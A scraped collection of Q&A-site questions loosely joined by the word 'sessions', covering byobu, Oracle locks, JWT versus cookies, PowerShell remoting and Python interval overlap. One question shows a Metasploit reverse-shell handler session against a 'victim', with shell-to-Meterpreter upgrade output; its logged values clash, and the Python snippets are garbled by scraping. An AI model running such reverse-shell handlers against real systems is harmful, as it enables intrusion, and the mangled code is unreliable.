14.04 – How to set the TERM variable in byobu (tmux) startup files with named sessions

I use byobu 5.77 with tmux 1.8-5 on Ubuntu 14.04. When I start a new byobu instance, my TERM variable is not set. Thus, I added export TERM=screen-256color to ~/.byoburc. It works fine. But when I start a new named sessions, i.e. byobu new -s <session_name>, the TERM variable is not set again. What is going on and how to fix it (so that the TERM variable would be set in named sessions too)?

Restore open Terminal sessions from Time Machine backup?

I just did a Time Machine restore of the full system on Catalina, and seems to have worked pretty well, with one exception – I had several Terminal windows open with bash history, but these haven’t been restored this time.

Where are these past terminal sessions stored? Could there be a way for me to restore these files specifically from some past Time Machine backup?

I did this once before with Chrome when it lost open windows and tabs; Chrome is a little temperamental when restoring open windows and tabs; in this case it restored some but not all; then, close the app and reopen it and all the original tabs appeared. Not so with Terminal, though (I closed and reopened the app and the lost windows don’t appear).

Wondering if anyone knows which files I could look for on a Time Machine backup and try restoring those specific files manually to get the sessions back.

oracle – How to connect to specific session id & serial# ? Blocked sessions

I have blocked sessions and see which session is blocking them, having session_id and serial#. Is it possible to connect to such session? How?

Background: using V$SESSION_BLOCKERS I see sessions are blocked by each other by INSERT statements to one of two tables: _REQUEST and _RESPONSE

Blocked sessions wait event: enq: TX - row lock contention

Query 1:

insert into _REQUEST (creation_date, IS_PROCESSED, name, packet, PARENT_SKID, BATCH_SKID, retry_delay, revision, SERVICE_NAME, ttl, type, REQUEST_SKID)
values (:1 , :2 , :3 , :4 , :5 , :6 , :7 , :8 , :9 , :10 , :11 , :12 )

Query 2a (from DB trigger, :B1 is a payload):

SELECT COALESCE(ERROR_DETAILS, ERROR_MESSAGE, FAULT_REASON, SOAP_ERROR) AS ERROR_MESSAGE, ERROR_CODE 
FROM XMLTABLE( '//*:DataHandlerWebServiceException | //*:Fault | //*:PLMDataHandlerError' 
     PASSING XMLTYPE(:B1 )
     COLUMNS ERROR_DETAILS VARCHAR2(256) PATH '*:errorDetails'
            ,ERROR_MESSAGE VARCHAR2(256) PATH '*:errorMessage'
            ,ERROR_CODE VARCHAR2(8) PATH '*:errorCode'
            ,FAULT_REASON VARCHAR2(256) PATH '*:Reason/*:Text'
            ,SOAP_ERROR VARCHAR2(256) PATH '*:COMMON_LOG_MESSAGE/*:LOG_MESSAGE' )

Query 2b (we already know APPEND is ignored here, see Note 1):

INSERT /*+ append */ INTO _response( RESPONSE_SKID, REQUEST_SKID, HAS_FAILED, WAS_TIMEOUT, IS_PROCESSED, SOAP_REQUEST_TIMESTAMP, SOAP_RESPONSE_TIMESTAMP, RESPONSE_HTTP_STATUS, ERROR_MESSAGE, RESPONSE_BODY )
values ( :1 , :2 , :3 , :4 , :5 , :6 , :7 , :8 , :9 , :10 )

How is it possible that INSERTs, to different tables, are blocking the sessions? I was looking into V$ACTIVE_SESSION_HISTORY but don’t find anything yet (I’m not a DBA yet)

Note 1: APPEND hint ignored

Metasploit: Issue with upgrading a low privilege shell (sessions -u)

Setup info: I don’t believe this is the issue as I regularly update my system. I’ll add one piece of information as an example. If you would really like to the rest then I can add more in later

metasploit v5.0.89-dev

Payload: I used a custom python script to create a reverse shell from the victim’s computer to the attacker. No problem with the low priv shell in netcat or metasploit. If anyone wants to take a look
at the script I can upload it to github and share the link(thought its nothing special, I’d prefer to send the link privately to keep the script as less spread as possible).

Exact Steps I took:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LPORT 549 
LPORT => 443
msf5 exploit(multi/handler) > set LHOST 10.8.210.314
LHOST => 10.9.139.110
msf5 exploit(multi/handler) > run

(*) Started reverse TCP handler on 10.9.139.110:443 
(*) Command shell session 1 opened (10.9.139.110:443 -> 10.9.0.1:50071) at 2020-05-30 22:31:25 -0400


Login: password
You have a shell have fun #> background

Background session 1? (y/N)  y
msf5 exploit(multi/handler) > sessions -u 1
(*) Executing 'post/multi/manage/shell_to_meterpreter' on session(s): (1)

The Issue:

(*) Upgrading session ID: 1
(*) Starting exploit/multi/handler
(*) Started reverse TCP handler on 10.9.139.110:4433 
(-) Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
(-) Call stack:
(-)   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
(-)   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
(-)   /usr/share/metasploit-framework/lib/msf/core/post/common.rb:147:in `cmd_exec'
(-)   /usr/share/metasploit-framework/lib/msf/core/post/windows/powershell.rb:32:in `have_powershell?'
(-)   /usr/share/metasploit-framework/modules/post/multi/manage/shell_to_meterpreter.rb:161:in `run'

Note: I have taken a look at some of the files, but they seem to be coded in ruby(something I am not familiar with) and the error seems to be related to multiple files, so I have no clue how to really debug this. There also seems to be similar issues posted on github if it helps.

authentication – Are JWT still not recommended for sessions?

It seems there is a large divide as to wether or not you should have JWT or Session ID for managing user session on WebApp/API (for a web front end or/and a mobile app).

It seems that the consensus goes to not using JWT (1,2,3,4) and keep on using cookies but i’ve seen more and more tutorials and people using JWT by default.

Even OSWAP now use JWT as session token instead of cookies (it is stored in the authorisation header/cookies and not in local storage obviously… but that not a hard task).

I’m trying to look at it neutrally and they seem to fit my usage:

  • session id also have an expiration date that can be long or short so i fail to see how it is an argument.
  • session id are persisted in the backend so having a blacklist for JWT doesn’t seem to be a “worst” solution
  • implementation are of the same level off complexity.

While with JWT i can:

  • store data inside the cookie is a nice feature to have (for roles for example)
  • fail my queries early if the token is in the blacklist/ if the data stored in the token is not validated (ie: try to access a route where your role, stored in the jwt, shouldn’t have access)
  • can be stateless on some routes, if needed / possible / less security required (no blacklist).
  • can be used as one time tokens for download

Is it still not recommended to use them as session? are there security issues i’m not aware of? Both could work for my use case but jwt would allow me to do more and currently i’m leaning towards using session “just because” of the consensus.

Kerberos second-hops using PowerShell Sessions

I often use PowerShell remote sessions to manage windows servers remotely, generally using the following command, though the following is true for any remote powershell commands such as Invoke-Command:

Enter-PSSession Server01

This works perfectly for almost everything local to that server, but never allows you to reach outside, e.g.:

PS C:> Enter-PSSession Server01
[Server01]: PS C:> Get-Item '\Server02ShareFile'

get-item : Access is denied

What is the easiest, secure way to do a second-hop like this? I have a couple answers I’ll add, but they generally have caveats.

Python – Merge overlapping sessions. How do I find the end value of the session?

I have the following block of code that determines the number of overlapping sessions. In the case of different intervals, the task is to print the maximum number of overlaps between these intervals at any time and also to determine the overlapping interval.

def overlap(v): 

    # variable to store the maximum 
    # count 
    ans = 0
    count = 0
    data = () 

    # storing the x and y 
    # coordinates in data vector 
    for i in range(len(v)): 

        # pushing the x coordinate 
        data.append((v(i)(0), 'x')) 

        # pushing the y coordinate 
        data.append((v(i)(1), 'y')) 

    # sorting of ranges 
    data = sorted(data) 

    # Traverse the data vector to 
    # count number of overlaps 
    for i in range(len(data)): 

        # if x occur it means a new range 
        # is added so we increase count 
        if (data(i)(1) == 'x'): 
            count += 1

        # if y occur it means a range 
        # is ended so we decrease count 
        if (data(i)(1) == 'y'): 
            count -= 1

        # updating the value of ans 
        # after every traversal 
        ans = max(ans, count) 

    # printing the maximum value 
    print(ans) 
v = (( 1, 2 ), ( 2, 4 ), ( 3, 6 ),(3,8))
overlap(v)

This is coming back 3. But what would be the best way to return the maximum overlap interval? In this case it should be (3,4). How can I change my existing code to get the required output? I've found a counter approach, but I'm trying to find a complete solution with my approach.

Python – Merge overlapping sessions

I have the following block of code that determines the number of overlapping sessions. In the case of different intervals, the task is to print the maximum number of overlaps between these intervals at any time and also to determine the overlapping interval.

def overlap(v): 

    # variable to store the maximum 
    # count 
    ans = 0
    count = 0
    data = () 

    # storing the x and y 
    # coordinates in data vector 
    for i in range(len(v)): 

        # pushing the x coordinate 
        data.append((v(i)(0), 'x')) 

        # pushing the y coordinate 
        data.append((v(i)(1), 'y')) 

    # sorting of ranges 
    data = sorted(data) 

    # Traverse the data vector to 
    # count number of overlaps 
    for i in range(len(data)): 

        # if x occur it means a new range 
        # is added so we increase count 
        if (data(i)(1) == 'x'): 
            count += 1

        # if y occur it means a range 
        # is ended so we decrease count 
        if (data(i)(1) == 'y'): 
            count -= 1

        # updating the value of ans 
        # after every traversal 
        ans = max(ans, count) 

    # printing the maximum value 
    print(ans) 

# Driver code 
v = (( 1, 2 ), ( 2, 4 ), ( 3, 6 ),(3,8)) 
overlap(v) 

This is coming back 3. So that answers the first question.
But what would be the best way to return the maximum overlap interval? In this case it should be (3,4). I found an O (n ^ 2) solution. But how could you best answer the second part?

Authentication – In Memory JWT for API authentication with HTTP-only cookie for sessions?

I've read about it for a while and know this is a common topic, but I was hoping to get some feedback on my authentication approach.

I have a SPA. It needs to authenticate to 1) my application backend and 2) some APIs on AWS. I use cognito to authenticate user credentials.

My idea of ​​doing this is as follows:

  1. The user authenticates using the AWS Cognito API
  2. Receives JWT
  3. Keeps JWT in memory only (no local storage – XSS)
  4. Passes JWT to the application backend
  5. The backend only sets a secure HTTP cookie on the client. STORAGE the JWT in this cookie.
  6. Cookie is used to manage sessions with the app backend
  7. In-memory JWT is used for authentication with AWS APIs

This is fine, but when the user closes the browser or changes tabs, the JWT is not in memory. However, you still have the session cookie. So my thought is that the application server will be asked for the JWT (within the cookie) before calling the AWS APIs.

That way, I have a secure HTTP-only cookie that manages sessions with my app server, and I also have the JWT to authenticate to the AWS APIs. If the user has a valid session cookie, it means that they can have the JWT it contains.

My only concern is that it appears a little circular. JWT authenticates itself to receive a cookie that will authenticate in the future to receive an updated JWT. Otherwise, I find it pretty solid.

Thoughts?